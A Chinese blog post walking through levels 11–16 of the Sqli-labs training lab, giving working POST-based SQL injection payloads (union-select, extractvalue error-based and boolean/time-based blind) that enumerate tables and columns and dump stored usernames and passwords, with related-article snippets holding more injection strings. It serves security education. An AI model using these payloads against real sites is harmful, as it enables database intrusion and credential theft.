Sqli-labs 11-16

最新推荐文章于 2021-03-09 19:03:21 发布
最新推荐文章于 2021-03-09 19:03:21 发布
阅读量105 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39086634/article/details/105421298
版权

Sqli-labs 11-16

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

使用BP抓包:

加单引号

说明存在报错注入

接下来,爆出数据库

爆出表名:

union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆出字段名

union select database(),group_concat(column_name) from information_schema.columns where table_name='users'--+

爆出用户和密码:

union select (select group_concat(username) from users),(select group_concat(password) from users)--+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

BP抓包

测试引号:

直接输入双引号显示错误,再添加单括号

说明为双引号单括号型注入

接下来,爆出数据库:

uname=asshole") union select version(),database()--+&passwd=admin&submit=Submit

爆出表名

asshole") union select database(),group_concat(table_name)from information_schema.tables where table_schema=database()--+

爆出字段名:

asshole") union select database(),group_concat(column_name)from information_schema.columns where table_name='users'--+

爆出用户名密码:

asshole") union select (select group_concat(username) from users),(select group_concat(password)from users)--+

 

 

 

 

 

 

 

 

 

 

 

 

 

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

BP抓包

发现该注入为盲注:

 

爆出数据库:

uname=ass') and extractvalue(1,concat('~',(select database()),'~')) # &passwd=admin&submit=Submit

爆出表名:

=ass') and  extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema =database())))  #

爆出字段名

uname=ass') and  extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name ='users'),'~'))  # &passwd=admin&submit=Submit

爆出用户名密码:

uname=ass') and  extractvalue(1,concat('~',(select group_concat(username,'//',password) from users),'~')) # &passwd=admin&submit=Submit

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Less-14 POST - Double Injection - Single quotes-  String -twist (POST单引号变形双注入)

同样也是盲注

只需要将单引号替换为双引号即可

爆出数据库:

 

爆出表名:

爆出字段名

 

爆出用户名密码

 

 

 

 

 

 

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

 

 

测试时间盲注:

发现有明显的延迟,使用时间盲注

数据库长度:

逐个测试数据库名

security

同理逐个测试表名

得到需要的users表

测试字段:

User,password等

 

 

 

 

 

 

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

 

Admin’ or 1=1 #错误

admin") or 1=1 #正确

基于布尔值或是基于时间注入

与15很相似,只需将’变为”)即可:

猜测数据库长度:

uname=ass") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit

逐一猜测数据库:得到security

猜测表名:

同理猜测用户名密码

 

 

 

 

 

 

总结

  1. 判断注入点
  2. 判断注入的类型
  3. 选择注入方式

 

 

 

Darklord.W
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql基于 extractvalue(),floor(),updatexml()函数的报错注入
2ed
03-27 1921
floor函数报错 select 1 from (select count(*),(concat(floor(rand(0)*2))x from information_schema.tables group by x)a; 暴库 select 1 from ( select count(*),(concat((select schema_name from information_sche...
sqli-labs 11-16
weixin_45442394的博客
09-14 290
一、环境配置 二、访问192.168.182.167:8001 Less-11 输入admin’,出现语法错误,存在字符型注入 admin’ or ‘1’=’1,登录成功 admin’ order by 2#,页面回显,有两列 -admin’ union select 1,2 #,判断显示位 -admin’ union select 1,database() #,判断数据库名称 查数据库“security”的表: -admin’ union select 1,group_concat(ta
sqli-labs:11-16,post注入
weixin_30471065的博客
03-28 98
sqli11: post:uname=xx' order by 2#&passwd=bla&submit=Submit(判定字段为2) 解释下为什么结果不是admin,这是sql执行的顺序问题 sqli12: sqli13: 不会返回登陆信息,只会提示成功与否。 盲注! sqli14: sqli...
sqli-labs】闯关记录11~16
qq_43665434的博客
03-09 107
sqli-labs】闯关记录11~16 【less-11】基于’的post方式注入 1、测试流程 先尝试使用万能密码 1' or 1=1# 如图所示,成功登录! 使用burp抓包 输入payload1' order by 5# 查看回显 用二分法最终测出主查询的字段数为2 //查询数据库基本信息 输入payload 回显信息 其余的步骤和之前一样,暴表名、字段名、字段值。这里就不再赘述。 2、源码分析 <?php //includi
在MSSQL中利用猜解出的表和字段得出记录
02-03
在MSSQL中利用猜解出的表和字段得出记录 实验环境请自行搭建
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
pikachu平台之sql注入
qq_42728977的博客
12-24 714
参考链接 原理 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 基本流程 1.2SQL注入攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL注入测试语句进行注入点发现 第二步:信息获取 通过...
SQL 盲注方法总结
junmin_lay的博客
08-14 2166
文章目录1,布尔盲注---构造逻辑判断①left(database(),1)②ascii(substr())=n③2,报错盲注①concat()floor(x)rand()②使用exp进行SQL报错注入③bigint溢出注入④xpath函数报错注入 1,布尔盲注—构造逻辑判断 ①left(database(),1) ②ascii(substr())=n ③ 2,报错盲注 基于报错的SQL盲注---...
MSSQL注入利用Group by&having猜表名和字段名
收集盒 Book box
09-06 4115
转自灵魂BLOG!! lcx和剑心等大牛在06年的时候就已经在用这种语法了,而我等小辈到最近才领略到,惭愧惭愧...... 手头暂时没有注入点测试,就先以我机器上的MSSQL做实验吧。 下面的语句我直接写完整的SQL语句,注入的时候稍微改改就能用了,呵呵。 假如现
SQL手工注入---表的猜解
孤的博客
10-13 2286
手工注入过程 找到注入点→表名→列名→列长度→列值 注入点:http://www.xxx.com/index.asp?id=1 猜解表名 http://www.xxx.com/index.asp?id=1 and exists(select * from 猜测的表名) 猜解列名 http://www.xxx.com/index.asp?id=1 and exists(select 猜测的列名 fr...
SQL注入思路与手工猜解大进阶
weixin_30470643的博客
06-12 224
什么叫SQL注入? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入的思路 思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结一下SQL注入入侵的总体的思...
sql注入之order by猜列数问题
weixin_33857679的博客
04-07 3510
环境: xampp-win32-5.6.3-0-VC11 dvwa-1.0.8 前言 有幸在网上搜到一款非常不错的渗透测试演练系统 — dvwa ,作为学习,演练真的非常强大啊! 在学习的过程中也遇到一些问题,所以这里做学习分享记录。 问题简述 在用dvwa做sql 注入检测时,遇到一个小小的问题 — order by 猜出来...
提取sql语句中的表名 (python)
onwingsofsong的博客
10-30 7788
import ply.lex as lex, re def extract_table_name_from_sql(sql_str): # remove the /* */ comments q = re.sub(r"/\*[^*]*\*+(?:[^*/][^*]*\*+)*/", "", sql_str) # remove whole line -- and #...
查询mysql特定数据库中某个表的所有列名
py_tamir的博客
05-12 2917
1. 打开mysql服务: serivce  mysqld start;2. 登录mysql:mysql -uroot -p  之后输入密码3.查询数据库:show databases;4.查询制定数据库: use 数据库名5.查看该数据下所有表:show tables;6.查询某个表中所有列名:    1&gt;DESC 表名    2&gt;select columns from 表名7. 实...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值